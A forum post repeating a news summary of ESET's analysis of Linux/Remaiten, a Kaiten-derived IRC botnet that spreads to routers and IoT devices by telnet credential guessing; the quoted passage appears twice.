- Jun 9, 2013
- 6,720
Kaiten, an Internet Relay Chat (IRC)-controlled malware typically used to carry out distributed denial-of-service (DDoS) attacks, has returned, in a stronger configuration. It’s targeting routers and internet of things (IoT) devices.
ESET researchers have identified three tougher versions of the malware, which they dubbed Linux/Remaiten and characterize as “a Linux bot on steroids.” The main feature of the malware is an improved spreading mechanism.
“ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points,” the company explained in an analysis. “Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware KTN-Remastered or KTN-RM.”
Based primarily on Linux/Gafgyt’s telnet scanning, the new versions improve on the spreading mechanism by carrying downloader executable binaries for embedded platforms such as routers and other connected devices.
When instructed to perform telnet scanning, the malware tries to connect to random public IP addresses. If the connection succeeds, it will try to guess the login credentials. If the malware successfully logs in, it will issue a shell command to download bot executable files for multiple system architectures and try to run them.
Full Article. Kaiten Malware Returns to Threaten IoT
ESET researchers have identified three tougher versions of the malware, which they dubbed Linux/Remaiten and characterize as “a Linux bot on steroids.” The main feature of the malware is an improved spreading mechanism.
“ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points,” the company explained in an analysis. “Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware KTN-Remastered or KTN-RM.”
Based primarily on Linux/Gafgyt’s telnet scanning, the new versions improve on the spreading mechanism by carrying downloader executable binaries for embedded platforms such as routers and other connected devices.
When instructed to perform telnet scanning, the malware tries to connect to random public IP addresses. If the connection succeeds, it will try to guess the login credentials. If the malware successfully logs in, it will issue a shell command to download bot executable files for multiple system architectures and try to run them.
Full Article. Kaiten Malware Returns to Threaten IoT